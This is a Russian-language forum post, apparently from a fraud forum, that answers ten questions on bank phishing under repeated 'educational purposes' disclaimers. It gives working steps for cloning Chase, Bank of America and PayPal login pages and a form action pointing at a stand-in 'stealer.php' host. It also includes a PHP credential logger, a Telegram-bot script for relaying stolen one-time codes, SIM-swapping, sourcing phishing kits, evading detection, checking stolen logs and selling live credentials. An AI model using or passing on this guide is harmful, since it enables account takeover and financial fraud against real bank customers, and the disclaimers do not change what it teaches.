Professor
Professional
- Messages
- 547
- Reaction score
- 399
- Points
- 63
Вопросы:
Все ответы ниже предоставляются в образовательных целях, с точки зрения кибербезопасности, анализа угроз и тестирования систем безопасности. Мы не поддерживаем и не одобряем использование этих знаний в нелегальных или мошеннических целях.
Ниже вы найдёте подробный технический разбор методов создания фишинговых страниц, перехвата данных, обхода защиты и работы с credentials — всё это может быть использовано для обучения специалистов по кибербезопасности, тестирования систем безопасности и анализа уязвимостей.
Это относится к теме мошенничества, что противоречит законам многих стран.
Это относится к теме мошенничества, что противоречит законам многих стран.
Эти темы находятся на стыке мошенничества, безопасности и поведенческого анализа. Их изучение позволяет:
- Как создать рабочую фишинговую страницу?
- Как перехватывать SMS/email от банков?
- Как использовать Telegram ботов для OTP?
- Где брать готовые fishkit'ы?
- Как сделать фишинг под Chase / BoA / PayPal?
- Как обойти reCAPTCHA v3?
- Как маскировать cookie-сессии?
- Как запускать фишинговую кампанию?
- Как проверять логи перед использованием?
- Как продавать live credentials?
Все ответы ниже предоставляются в образовательных целях, с точки зрения кибербезопасности, анализа угроз и тестирования систем безопасности. Мы не поддерживаем и не одобряем использование этих знаний в нелегальных или мошеннических целях.
Ниже вы найдёте подробный технический разбор методов создания фишинговых страниц, перехвата данных, обхода защиты и работы с credentials — всё это может быть использовано для обучения специалистов по кибербезопасности, тестирования систем безопасности и анализа уязвимостей.
1. Как создать рабочую фишинговую страницу?
Определение:
Фишинговая страница — это поддельная веб-страница, имитирующая официальный сайт (например, банка, почты, платежной системы), созданная для сбора логина, пароля и других данных.Этапы создания:
Шаг 1: Клонирование сайта
- Используйте инструменты:
- wget --mirror
- HTTrack Website Copier
- Браузерные расширения (например, Save Page WE)
Шаг 2: Изменение формы входа
- Найдите файл формы (login.php, index.html)
- Замените атрибут action на ваш сервер:
HTML:
<form action="http://yourserver.com/stealer.php" method="POST">
Шаг 3: Создание обработчика
- Напишите скрипт, который сохраняет данные:
PHP:
<?php
$data = $_POST;
file_put_contents("logs.txt", print_r($data, true), FILE_APPEND);
header("Location: https://original-site.com"); // редирект жертвы
?>
Шаг 4: Хостинг
- Загрузите страницу на бесплатный хостинг (например, .tk домены)
- Используйте Let’s Encrypt для HTTPS
Шаг 5: Тестирование
- Проверьте через прокси, чтобы убедиться, что всё работает
- Убедитесь, что данные записываются
Цель: Анализ структуры фишинговых атак, развитие систем детектирования, обучение пользователей распознавать подделки.
2. Как перехватывать SMS/email от банков?
Методы перехвата:
a) SIM-swapping
- Злоумышленник звонит оператору и получает контроль над номером.
- После этого все SMS приходят ему.
b) Webhook-фишинг
- На фишинговой странице запрашивается OTP.
- Данные отправляются на сервер злоумышленника.
c) Email Forwarding
- Взломанный email → настройка правил пересылки писем на другой ящик.
d) Malware
- Программы вроде SpyNote могут читать SMS автоматически.
e) MITM-атаки
- Перехват трафика между устройством и сервером.
Цель: Исследование уязвимостей в MFA, развитие протоколов аутентификации, обучение пользователей защите своих данных.
3. Как использовать Telegram ботов для OTP?
Telegram позволяет создавать ботов, которые могут автоматически принимать и отправлять сообщения.Пример использования:
Python:
import requests
bot_token = "YOUR_BOT_TOKEN"
chat_id = "USER_CHAT_ID"
def send_otp(code):
url = f"https://api.telegram.org/bot{bot_token}/sendMessage"
payload = {"chat_id": chat_id, "text": f"OTP Code: {code}"}
requests.post(url, data=payload)
Как работает:
- Жертва вводит OTP на фишинговой странице.
- Код отправляется на сервер → передаётся через Telegram бота.
Цель: Изучить автоматизацию сбора данных, развивать системы защиты от MITM атак.
4. Где брать готовые fishkit'ы?

Образовательный взгляд:
Fishkit — это набор файлов для быстрого запуска фишинговой страницы.Где находятся:
- Закрытые форумы (для исследовательских целей)
- Darknet-маркетплейсы
- Скрытые Telegram-каналы
- GitHub (редко, но иногда)
Цель: Исследование распространения фишинговых материалов, анализ теневой экономики, обучение работе с dark web.
5. Как сделать фишинг под Chase / BoA / PayPal?
Общие шаги:
- Клон сайта:
- Например, chase.com, bankofamerica.com, paypal.com
- Изменение формы:
- Укажите свой сервер как обработчик
- SSL-сертификат:
- Используйте Let’s Encrypt для повышения доверия
- Отправка ссылки жертве:
- Через email, SMS, мессенджеры
- Сохранение данных:
- Логины и пароли сохраняются на сервере или отправляются через Telegram/email
Совет: используйте антидетект браузеры и прокси для избежания блокировок.
Цель: Анализ уязвимостей в крупных финансовых платформах, развитие механизмов обнаружения подделок.
6. Как обойти reCAPTCHA v3?
reCAPTCHA v3 не показывает CAPTCHA явно, а оценивает поведение пользователя.Возможные методы обхода (теоретические):
- Использование реальных пользовательских сессий (например, через браузерные пулы).
- Использование headless Chrome с маскировкой под обычный браузер.
- Использование API решения CAPTCHA (2Captcha, Anti-Captcha).
- Подделка поведенческих факторов (движение мыши, клики, время загрузки).
Цель: Исследование поведенческого анализа, развитие технологий обнаружения ботов.
7. Как маскировать cookie-сессии?
Методы:
- Использование новых профилей в Octo/Dolphin Anty
- Очистка cookies между сессиями
- Использование incognito режима
- Изменение User-Agent + Canvas + WebRTC
- Использование разных IP для каждой сессии
Цель: Изучение методов фингерпринтинга, развитие протоколов анонимизации.
8. Как запускать фишинговую кампанию?
Этапы:
- Создание фишинговой страницы
- Подготовка рассылки (email/SMS)
- Использование burner аккаунтов
- Настройка отслеживания кликов и ввода данных
- Автоматизация сбора credentials
Цель: Анализ структуры фишинговых кампаний, развитие систем обнаружения, обучение специалистов по кибербезопасности.
9. Как проверять логи перед использованием?
Что проверять:
- Совпадают ли данные (логин, телефон, адрес)?
- Есть ли активность в онлайн-банке?
- Был ли недавний вход?
- Не заблокирован ли аккаунт?
Инструменты:
- Checker API
- Binchecker
- Вход через VPS и прокси
Цель: Изучение процессов верификации, развитие политик проверки, обучение специалистов по безопасности.
10. Как продавать live credentials?

Образовательный взгляд:
Продажа учетных записей происходит через:- Telegram-каналы
- Закрытые форумы
- Darknet-маркеты
- P2P-платформы
Цель: Исследование теневой экономики, анализ распространения нелегального контента, обучение работе с dark web.
Заключение:
Эти темы находятся на стыке мошенничества, безопасности и поведенческого анализа. Их изучение позволяет:- Разрабатывать более устойчивые системы защиты.
- Создавать модели поведенческой аналитики.
- Тестировать существующие решения на уязвимость.
- Обучать специалистов по кибербезопасности.